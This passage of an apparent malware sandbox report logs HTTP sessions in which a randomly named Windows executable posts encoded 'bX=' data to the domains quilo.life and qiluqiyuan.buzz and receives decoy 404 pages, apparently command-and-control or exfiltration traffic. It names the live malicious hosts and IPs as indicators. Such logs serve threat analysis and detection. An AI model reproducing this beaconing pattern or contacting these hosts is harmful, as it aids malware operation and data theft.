                              Data Ascii: bX=2iJzcjLeEdvuVfksWoAGgkc5qyxu3mNatPN6DoyQ5RG0libf5B0AP2QcQCTnSkSOinQhoeQveNOlZB5V4dap/eBbJ6KZ1Mk31uG2GvgQaN+vqydTm9/zf5vt9G15k0SWLlcYAFXOmvRjyW2hW6IPKq57DDfR1M3/y+uMTXRBbpcl0r6CuHfpjCAP4etNddDGOlHrYyY=
                              Sep 16, 2024 09:31:02.718168974 CEST | 658 | IN | HTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:02 GMT
                              Server: Apache
                              Content-Length: 514
                              Connection: close
                              Content-Type: text/html
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              18 | 192.168.2.5 | 58663 | 203.161.43.228 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:04.654110909 CEST | 738 | OUT | POST /ftr3/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.quilo.life
                              Origin: http://www.quilo.life
                              Referer: http://www.quilo.life/ftr3/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 45 50 30 73 58 50 38 47 6d 45 63 2b 76 79 78 75 68 57 4d 54 74 50 4a 36 44 6f 62 4e 35 69 69 30 6d 48 2f 66 34 44 4d 41 49 32 51 63 45 53 53 76 63 45 53 56 69 6e 73 59 6f 62 34 76 65 4d 71 6c 5a 45 39 56 35 75 43 71 2f 4f 42 5a 41 61 4b 62 36 73 6b 33 31 75 47 32 47 76 31 39 61 4f 4f 76 72 43 74 54 30 4a 6a 38 54 5a 76 79 70 57 31 35 76 55 53 53 4c 6c 63 71 41 45 61 54 6d 74 5a 6a 79 57 6d 68 56 75 63 4d 45 71 34 2b 4f 6a 65 65 31 4d 32 61 33 50 65 56 4d 30 73 6a 59 2f 64 61 34 39 58 6f 30 6c 58 42 77 69 73 33 6f 4e 6c 36 4d 74 69 76 55 47 58 62 47 6c 4e 33 51 73 32 74 45 51 74 2b 31 55 6f 41 65 67 66 30 6b 65 53 64
                              Data Ascii: bX=2iJzcjLeEdvuEP0sXP8GmEc+vyxuhWMTtPJ6DobN5ii0mH/f4DMAI2QcESSvcESVinsYob4veMqlZE9V5uCq/OBZAaKb6sk31uG2Gv19aOOvrCtT0Jj8TZvypW15vUSSLlcqAEaTmtZjyWmhVucMEq4+Ojee1M2a3PeVM0sjY/da49Xo0lXBwis3oNl6MtivUGXbGlN3Qs2tEQt+1UoAegf0keSd
                              Sep 16, 2024 09:31:05.234532118 CEST | 658 | IN | HTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:05 GMT
                              Server: Apache
                              Content-Length: 514
                              Connection: close
                              Content-Type: text/html
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              19 | 192.168.2.5 | 58664 | 203.161.43.228 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:07.203464985 CEST | 1755 | OUT | POST /ftr3/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.quilo.life
                              Origin: http://www.quilo.life
                              Referer: http://www.quilo.life/ftr3/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 45 50 30 73 58 50 38 47 6d 45 63 2b 76 79 78 75 68 57 4d 54 74 50 4a 36 44 6f 62 4e 35 69 71 30 6c 31 33 66 2b 69 4d 41 4a 32 51 63 62 69 53 73 63 45 53 59 69 6e 46 51 6f 62 31 59 65 50 43 6c 4c 32 31 56 2b 66 43 71 30 4f 42 5a 4e 36 4b 65 31 4d 6b 6d 31 6f 6e 2f 47 76 6c 39 61 4f 4f 76 72 41 46 54 6a 4e 2f 38 52 5a 76 74 39 47 31 31 6b 30 53 32 4c 6c 46 64 41 45 66 6b 6d 63 35 6a 79 33 57 68 5a 37 49 4d 49 71 34 77 4c 6a 66 42 31 4d 36 4a 33 50 43 5a 4d 31 49 4a 59 34 52 61 37 62 69 45 6b 6e 4c 48 71 52 73 7a 6f 65 39 55 4e 72 53 42 61 6d 43 78 46 56 46 75 52 75 61 67 55 57 68 42 31 77 39 66 42 55 37 4d 70 35 72 50 77 39 47 35 70 5a 79 6e 71 51 47 69 5a 36 6f 7a 70 6e 70 6f 74 44 35 76 77 50 50 52 56 6c 41 64 52 64 51 7a 7a 6c 6d 46 6b 52 63 2f 55 42 53 48 4e 57 30 51 49 48 30 5a 6f 70 59 75 47 4b 64 7a 70 38 6b 6d 54 39 33 35 39 65 79 5a 56 36 68 69 78 44 74 49 68 35 4c 2b 43 55 45 47 73 48 62 6c 2f 4e 66 6c 46 4d 30 62 5a 56 35 4e 57 74 35 6a 68 31 39 [TRUNCATED]
                              Data Ascii: bX= [TRUNCATED]
                              Sep 16, 2024 09:31:07.820034027 CEST | 658 | IN | HTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:07 GMT
                              Server: Apache
                              Content-Length: 514
                              Connection: close
                              Content-Type: text/html
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              20 | 192.168.2.5 | 58665 | 203.161.43.228 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:09.747811079 CEST | 460 | OUT | GET /ftr3/?bX=7ghTfXuNFdv7bt0fQ6dp+VYKrg9F0VottJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+g+0qN5CZ17IzjLi3DtoRUNuK8DdWmd+CTazIxVVgqHT8dA==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.quilo.life
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:31:10.330846071 CEST | 673 | IN | HTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:10 GMT
                              Server: Apache
                              Content-Length: 514
                              Connection: close
                              Content-Type: text/html; charset=utf-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              21 | 192.168.2.5 | 58666 | 161.97.168.245 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:15.410332918 CEST | 733 | OUT | POST /wjff/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.qiluqiyuan.buzz
                              Origin: http://www.qiluqiyuan.buzz
                              Referer: http://www.qiluqiyuan.buzz/wjff/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 52 4d 43 66 79 5a 38 61 44 63 48 4b 35 4e 4e 2b 46 37 65 32 6b 70 4f 6d 34 4c 42 49 66 42 78 4e 47 33 4f 30 43 65 7a 74 35 52 47 38 6d 50 4e 71 44 54 62 46 41 78 70 59 6c 79 2f 4d 67 45 43 59 43 51 6e 39 75 35 74 50 46 65 59 45 4f 4b 74 2f 47 2b 77 56 30 33 43 30 78 51 57 66 50 44 74 31 77 2f 7a 70 33 39 2b 35 61 74 31 6a 30 49 42 52 45 34 36 49 6a 38 54 34 6e 74 7a 6f 41 53 7a 6a 42 54 37 79 77 68 62 47 44 50 77 6f 47 4a 38 57 48 49 77 38 59 68 4e 44 47 7a 48 71 7a 58 69 30 6c 79 4e 67 37 54 2f 55 56 31 4d 2b 6a 43 5a 53 64 4d 39 71 73 6f 54 6d 70 65 77 3d
                              Data Ascii: bX=1I9qNX7VLGDrRMCfyZ8aDcHK5NN+F7e2kpOm4LBIfBxNG3O0Cezt5RG8mPNqDTbFAxpYly/MgECYCQn9u5tPFeYEOKt/G+wV03C0xQWfPDt1w/zp39+5at1j0IBRE46Ij8T4ntzoASzjBT7ywhbGDPwoGJ8WHIw8YhNDGzHqzXi0lyNg7T/UV1M+jCZSdM9qsoTmpew=
                              Sep 16, 2024 09:31:16.021503925 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:31:15 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: W/"66cd104a-b96"
                              Content-Encoding: gzip
                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                              Sep 16, 2024 09:31:16.021528006 CEST | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              22 | 192.168.2.5 | 58667 | 161.97.168.245 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:17.953509092 CEST | 753 | OUT | POST /wjff/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.qiluqiyuan.buzz
                              Origin: http://www.qiluqiyuan.buzz
                              Referer: http://www.qiluqiyuan.buzz/wjff/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 51 74 79 66 2f 61 45 61 4c 63 48 4e 38 4e 4e 2b 53 72 65 79 6b 6f 79 6d 34 4c 6f 4e 63 7a 6c 4e 47 56 6d 30 44 63 4c 74 30 78 47 38 74 76 4e 56 4f 7a 62 61 41 78 73 37 6c 77 62 4d 67 46 6d 59 43 53 76 39 75 75 5a 41 45 4f 59 43 47 71 74 39 49 65 77 56 30 33 43 30 78 51 53 78 50 44 6c 31 7a 4f 44 70 77 70 69 34 57 4e 31 67 7a 49 42 52 58 6f 36 4d 6a 38 54 4f 6e 73 2f 4f 41 58 76 6a 42 54 4c 79 77 77 62 48 4a 50 77 78 43 4a 39 58 58 39 56 74 66 6d 74 71 43 77 6e 6a 76 55 6d 69 74 6b 67 4b 68 78 33 38 47 56 67 47 7a 52 52 6c 4d 38 63 44 32 4c 44 57 33 4a 6b 32 53 77 37 30 49 76 32 67 71 30 4c 5a 64 61 6c 79 6a 59 55 2f
                              Data Ascii: bX=1I9qNX7VLGDrQtyf/aEaLcHN8NN+Sreykoym4LoNczlNGVm0DcLt0xG8tvNVOzbaAxs7lwbMgFmYCSv9uuZAEOYCGqt9IewV03C0xQSxPDl1zODpwpi4WN1gzIBRXo6Mj8TOns/OAXvjBTLywwbHJPwxCJ9XX9VtfmtqCwnjvUmitkgKhx38GVgGzRRlM8cD2LDW3Jk2Sw70Iv2gq0LZdalyjYU/
                              Sep 16, 2024 09:31:18.573765993 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:31:18 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: W/"66cd104a-b96"
                              Content-Encoding: gzip
                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                              Sep 16, 2024 09:31:18.573797941 CEST | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              23 | 192.168.2.5 | 58668 | 161.97.168.245 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:20.496243000 CEST | 1770 | OUT | POST /wjff/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.qiluqiyuan.buzz
                              Origin: http://www.qiluqiyuan.buzz
                              Referer: http://www.qiluqiyuan.buzz/wjff/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
